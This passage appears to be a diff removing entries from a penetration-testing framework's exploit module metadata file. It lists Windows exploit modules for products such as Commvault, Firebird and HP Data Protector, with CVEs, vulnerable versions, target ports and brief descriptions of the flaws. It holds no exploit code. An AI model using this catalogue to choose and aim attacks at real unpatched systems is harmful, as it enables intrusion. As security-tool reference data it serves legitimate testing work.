opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846", - "ZDI-12-010" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_objects", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/cloudme_sync": { - "name": "CloudMe Sync v1.10.9", - "fullname": "exploit/windows/misc/cloudme_sync", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-01-17", - "type": "exploit", - "author": [ - "hyp3rlinx", - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. This module has been\n tested successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2018-6892", - "EDB-44027" - ], - "platform": "Windows", - "arch": "", - "rport": 8888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CloudMe Sync v1.10.9" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/cloudme_sync.rb", - "is_install_path": true, - "ref_name": "windows/misc/cloudme_sync", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/commvault_cmd_exec": { - "name": "Commvault Communications Service (cvd) Command Injection", - "fullname": "exploit/windows/misc/commvault_cmd_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2017-12-12", - "type": "exploit", - "author": [ - "b0yd" - ], - "description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.", - "references": [ - "CVE-2017-18044", - "URL-https://www.securifera.com/advisories/sec-2017-0001/" - ], - "platform": "Windows", - "arch": "", - "rport": 8400, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/misc/commvault_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/crosschex_device_bof": { - "name": "Anviz CrossChex Buffer Overflow", - "fullname": "exploit/windows/misc/crosschex_device_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-11-28", - "type": "exploit", - "author": [ - "Luis Catarino ", - "Pedro Rodrigues ", - "agalway-r7", - "adfoster-r7" - ], - "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.", - "references": [ - "CVE-2019-12518", - "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html", - "EDB-47734" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Crosschex Standard x86 <= V4.3.12" - ], - "mod_time": "2020-03-05 14:48:37 +0000", - "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/crosschex_device_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/cve_2022_28381_allmediaserver_bof": { - "name": "ALLMediaServer 1.6 SEH Buffer Overflow", - "fullname": "exploit/windows/misc/cve_2022_28381_allmediaserver_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2022-04-01", - "type": "exploit", - "author": [ - "Hejap Zairy Al-Sharif" - ], - "description": "This module exploits a stack buffer overflow leading to a SEH handler overwrite\n in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error\n within the handling of a HTTP request. Note that this exploit will only work\n against x86 or WoW64 targets, x64 is not supported at this time.", - "references": [ - "CVE-2022-28381", - "URL-https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow" - ], - "platform": "Windows", - "arch": "x86", - "rport": 888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ALLMediaServer 1.6" - ], - "mod_time": "2022-04-01 17:57:27 +0000", - "path": "/modules/exploits/windows/misc/cve_2022_28381_allmediaserver_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/cve_2022_28381_allmediaserver_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/delta_electronics_infrasuite_deserialization": { - "name": "Delta Electronics InfraSuite Device Master Deserialization", - "fullname": "exploit/windows/misc/delta_electronics_infrasuite_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-17", - "type": "exploit", - "author": [ - "Anonymous", - "Shelby Pace" - ], - "description": "Delta Electronics InfraSuite Device Master versions below v1.0.5 have an\n unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'\n method of the 'Device-Gateway-Status' process.\n\n The 'ParseUDPPacket()' method reads user-controlled packet data and eventually\n calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,\n leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.", - "references": [ - "CVE-2023-1133", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-672/", - "URL-https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 10100, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows CMD" - ], - "mod_time": "2023-06-07 16:42:01 +0000", - "path": "/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/delta_electronics_infrasuite_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/disk_savvy_adm": { - "name": "Disk Savvy Enterprise v10.4.18", - "fullname": "exploit/windows/misc/disk_savvy_adm", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-01-31", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. This module\n has been tested successfully on Windows 7 SP1 x86.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 9124, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Disk Savvy Enterprise v10.4.18" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/disk_savvy_adm.rb", - "is_install_path": true, - "ref_name": "windows/misc/disk_savvy_adm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/doubletake": { - "name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", - "fullname": "exploit/windows/misc/doubletake", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-04", - "type": "exploit", - "author": [ - "ri0t " - ], - "description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n was found by Titon of Bastard Labs.", - "references": [ - "CVE-2008-1661", - "OSVDB-45924" - ], - "platform": "Windows", - "arch": "", - "rport": 1100, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "doubletake 4.5.0", - "doubletake 4.4.2", - "doubletake 4.5.0.1819" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/doubletake.rb", - "is_install_path": true, - "ref_name": "windows/misc/doubletake", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eiqnetworks_esa": { - "name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", - "fullname": "exploit/windows/misc/eiqnetworks_esa", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-24", - "type": "exploit", - "author": [ - "MC ", - "ri0t ", - "kf " - ], - "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. This module has only been tested\n against ESA v2.1.13.", - "references": [ - "CVE-2006-3838", - "OSVDB-27526", - "BID-19163", - "ZDI-06-024" - ], - "platform": "Windows", - "arch": "", - "rport": 10616, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "EnterpriseSecurityAnalyzerv21 Universal", - "EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English", - "EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2", - "EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1", - "Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2", - "Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2", - "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb", - "is_install_path": true, - "ref_name": "windows/misc/eiqnetworks_esa", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eiqnetworks_esa_topology": { - "name": "eIQNetworks ESA Topology DELETEDEVICE Overflow", - "fullname": "exploit/windows/misc/eiqnetworks_esa_topology", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.", - "references": [ - "CVE-2006-3838", - "OSVDB-27528", - "BID-19164" - ], - "platform": "Windows", - "arch": "", - "rport": 10628, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb", - "is_install_path": true, - "ref_name": "windows/misc/eiqnetworks_esa_topology", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/enterasys_netsight_syslog_bof": { - "name": "Enterasys NetSight nssyslogd.exe Buffer Overflow", - "fullname": "exploit/windows/misc/enterasys_netsight_syslog_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-19", - "type": "exploit", - "author": [ - "Jeremy Brown", - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.", - "references": [ - "CVE-2011-5227", - "OSVDB-77971", - "BID-51124", - "ZDI-11-350" - ], - "platform": "Windows", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Enterasys NetSight 4.0.1.34 / Windows XP SP3", - "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/enterasys_netsight_syslog_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eureka_mail_err": { - "name": "Eureka Email 2.2q ERR Remote Buffer Overflow", - "fullname": "exploit/windows/misc/eureka_mail_err", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-22", - "type": "exploit", - "author": [ - "Francis Provencher (Protek Research Labs)", - "Dr_IDE", - "dookie", - "jduck " - ], - "description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.", - "references": [ - "CVE-2009-3837", - "OSVDB-59262", - "EDB-10235" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win XP SP3 English", - "Win XP SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eureka_mail_err.rb", - "is_install_path": true, - "ref_name": "windows/misc/eureka_mail_err", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_cnct_group": { - "name": "Firebird Relational Database CNCT Group Number Buffer Overflow", - "fullname": "exploit/windows/misc/fb_cnct_group", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-31", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. A two-phases\n stack pivot allows to execute the ROP chain which ultimately is used to execute\n VirtualAlloc and bypass DEP.", - "references": [ - "CVE-2013-2492", - "OSVDB-91044" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows FB 2.5.2.26539", - "Windows FB 2.5.1.26351", - "Windows FB 2.1.5.18496", - "Windows FB 2.1.4.18393", - "Debug" - ], - "mod_time": "2018-10-27 20:54:14 +0000", - "path": "/modules/exploits/windows/misc/fb_cnct_group.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_cnct_group", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_isc_attach_database": { - "name": "Firebird Relational Database isc_attach_database() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_isc_attach_database", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38607", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_isc_attach_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_isc_create_database": { - "name": "Firebird Relational Database isc_create_database() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_isc_create_database", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38606", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/fb_isc_create_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_isc_create_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_svc_attach": { - "name": "Firebird Relational Database SVC_attach() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_svc_attach", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38605", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/fb_svc_attach.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_svc_attach", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/gh0st": { - "name": "Gh0st Client buffer Overflow", - "fullname": "exploit/windows/misc/gh0st", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-07-27", - "type": "exploit", - "author": [ - "Professor Plum" - ], - "description": "This module exploits a Memory buffer overflow in the Gh0st client (C2 server)", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Gh0st Beta 3.6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/gh0st.rb", - "is_install_path": true, - "ref_name": "windows/misc/gh0st", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/gimp_script_fu": { - "name": "GIMP script-fu Server Buffer Overflow", - "fullname": "exploit/windows/misc/gimp_script_fu", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-18", - "type": "exploit", - "author": [ - "Joseph Sheridan", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.", - "references": [ - "CVE-2012-2763", - "OSVDB-82429", - "BID-53741", - "EDB-18956", - "URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html" - ], - "platform": "Windows", - "arch": "", - "rport": 10008, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", - "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/gimp_script_fu.rb", - "is_install_path": true, - "ref_name": "windows/misc/gimp_script_fu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_cmd_exec": { - "name": "HP Data Protector 8.10 Remote Command Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-11-02", - "type": "exploit", - "author": [ - "Christian Ramirez", - "Henoch Barrera", - "Matthew Hall " - ], - "description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.", - "references": [ - "CVE-2014-2623", - "OSVDB-109069", - "EDB-34066", - "URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 8.10 / Windows" - ], - "mod_time": "2022-02-15 18:03:13 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_crs": { - "name": "HP Data Protector Cell Request Service Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_crs", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-03", - "type": "exploit", - "author": [ - "e6af8de8b1d4b2b6d5ba2610cbf9cd38", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.", - "references": [ - "CVE-2013-2333", - "OSVDB-93867", - "BID-60309", - "ZDI-13-130" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "HP Data Protector 6.20 build 370 / Windows XP SP3", - "HP Data Protector 7.00 build 72 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_crs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_dtbclslogin": { - "name": "HP Data Protector DtbClsLogin Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_dtbclslogin", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-09", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.", - "references": [ - "CVE-2010-3007", - "OSVDB-67973", - "BID-43105", - "ZDI-10-174", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535" - ], - "platform": "Windows", - "arch": "", - "rport": 3817, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_dtbclslogin", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_encrypted_comms": { - "name": "HP Data Protector Encrypted Communication Remote Command Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_encrypted_comms", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-04-18", - "type": "exploit", - "author": [ - "Jon Barg", - "Ian Lovering" - ], - "description": "This module exploits a well known remote code execution exploit after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell so will only work\n against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.", - "references": [ - "CVE-2016-2004", - "URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_encrypted_comms", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_exec_bar": { - "name": "HP Data Protector Backup Client Service Remote Code Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_exec_bar", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-01-02", - "type": "exploit", - "author": [ - "Aniway.Anyway ", - "juan vazquez " - ], - "description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows to\n execute arbitrary processes. This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.", - "references": [ - "CVE-2013-2347", - "BID-64647", - "ZDI-14-008", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422", - "URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.20 build 370 / VBScript CMDStager", - "HP Data Protector 6.20 build 370 / Powershell" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_exec_bar", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_install_service": { - "name": "HP Data Protector 6.10/6.11/6.20 Install Service", - "fullname": "exploit/windows/misc/hp_dataprotector_install_service", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-02", - "type": "exploit", - "author": [ - "Ben Turner" - ], - "description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\", - "references": [ - "CVE-2011-0922", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.10/6.11/6.20 / Windows" - ], - "mod_time": "2022-05-11 12:40:43 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_install_service", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_new_folder": { - "name": "HP Data Protector Create New Folder Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_new_folder", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-12", - "type": "exploit", - "author": [ - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer 